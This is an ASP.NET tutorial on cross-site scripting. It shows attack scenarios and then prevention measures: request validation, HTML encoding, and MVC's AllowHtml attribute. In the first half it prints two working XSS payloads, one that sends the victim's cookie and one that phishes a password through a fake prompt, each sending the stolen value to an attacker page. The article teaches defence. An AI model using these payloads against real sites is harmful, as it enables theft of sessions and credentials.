Cross-Site Scripting (XSS) Attack And Its Prevention Mechanism

In this article, you will learn about Cross-Site Scripting (XSS) attack and its prevention mechanism.

XSS attack exploits vulnerabilities in Web page validation by injecting client-side script code. Online you can find many examples related to this kind of attack but in this article I am going to show you a few real time examples.

XSS Attack Examples with real time scenarios

We know that hackers can inject their script files through victim’s browser (like in input fields). Let's see a few scenarios as below:

Scenario #1

Using a cookie a hacker can hack a victim’s username and password and save their credentials in his/her database.

Here we have a victim’s page like this,

code

And the code behind file as below,

code

Now the hacker can inject the below highlighted script into the input control of the web page.

<script>window.open('http://localhost:62887/XSS/AttackerPage.aspx?cookie='+document.cookie,'_blank')</script>


Screenshot


login

We enter the above script in any one of the input controls of the web page and after submitting the web form whatever we entered in the input textboxes will go to the hacker’s database. Please refer to the below screenshots for reference.

Screenshot #1

login

Screenshot #2

login

When we refresh the browser the credential will be saved in victim’s database

Screenshot #1

login
Screenshot #2

cookies

And by using those credentials the hacker can do anything that he/she wants to do with the victim’s database.

Scenario #2

Using a prompt box, asking for a password verification and once the end user enters the password then the entered password will be saved in hacker's database.

Once the hacker enters the below script in one of the input control of the web page then after submitting the form the entered script will be saved in the database. If you observe the below script, the hacker prepared a script with his/her web page address in "window.open" box.

  1. <script>  
  2.     varpwd = prompt("please verify your password for security reason", "");  
  3.     if (pwd != null)  
  4.     {  
  5.         window.open('http://localhost:62887/XSS/AttackerPage.aspx?password=' + pwd, '_blank');  
  6.     }  
  7. </script>  
Web page screenshot

Web page

After clicking on submit button,

Web page

comment

After refreshing the browser the end user will get a prompt box like as below,

prompt
After giving password in this prompt box and clicking on Ok button then the entered password will be saved in hacker’s database as like below,

prompt
After clicking on Ok button,

button

id

The attacker's web page code behind file as below,

AttackerPage.aspx.cs

code

Prevention mechanism

Prevention mechanism when we work with Web forms application:

Attackers can attack in various ways and we have to prevent our web application from all kind of attack scenarios. The possible prevention ways for XSS attack are as following,

Step 1: Check that ASP.NET request validation is enabled.
Step 2: Verify ASP.NET code that generates HTML output.
Step 3: Find out whether HTML output includes input parameters.
Step 4: Check potentially dangerous HTML attributes and tags.
Step 5: Find out countermeasures.

By default, request validation is enabled in Machine.config.

If we set ValidateRequest="true"or remove the ValidateRequest page attribute and browse to the page again then the following error message will be displayed.

As we know theValidateRequest page attribute by default is true for a web form, so when the hacker enters any malicious XSS script (for instance "<script>alert ('hello...") thenRequest.Form detects this kind of injection and rejects the input because the input includes potentially dangerous HTML characters.

For example

code

Output

Output

Encode HTML Tags

Encode the string input using HtmlEncode method. Use a StringBuilder and call the Replace method to selectively remove the encoding on the HTML elements that you want to permit. Sample code with screenshot as below:

code

Or you can write a Regular Expression to replace HTML tags by replacing its encode character. Sample code as below,

code

Whatever we applied at client side is not enough because we can’t trust client side code, so we have to handle code behind file as well. Sample code as below,

code

Use of AllowHtml Attribute in MVC

Sometimes we have a requirement to save HTML data in the database and our application in built in MVC rather than ASP.NET Web forms application. By default ASP.NET MVC does not allow a user to submit HTML tags for avoiding Cross-Site Scripting attack to our application. I have a MVC application and my page is as below,

Sometimes we have requirement to save HTML data in the database and our application in build in MVC rather than ASP.NET Web forms application. By default ASP.NET MVC does not allow a user to submit HTML tags for avoiding Cross-Site Scriptingattack to our application. I have a MVC application and my page like as below:

Now I am inputting an HTML tag to Content field and this will be like,

Content field
After clicking CREATE button the page will be like this,

error

So to overcome this type of error in MVC applications we have to use “AllowHtml” attribute in our model class. Now I am applying this attribute to my Content field that is present in AllowHtmlModel class like this,

code

If we write like this in model class then any HTML tag we can input in our MVC application will allow HTML tags to that field to which AllowHtml attribute is applied in model class, but no to other fields.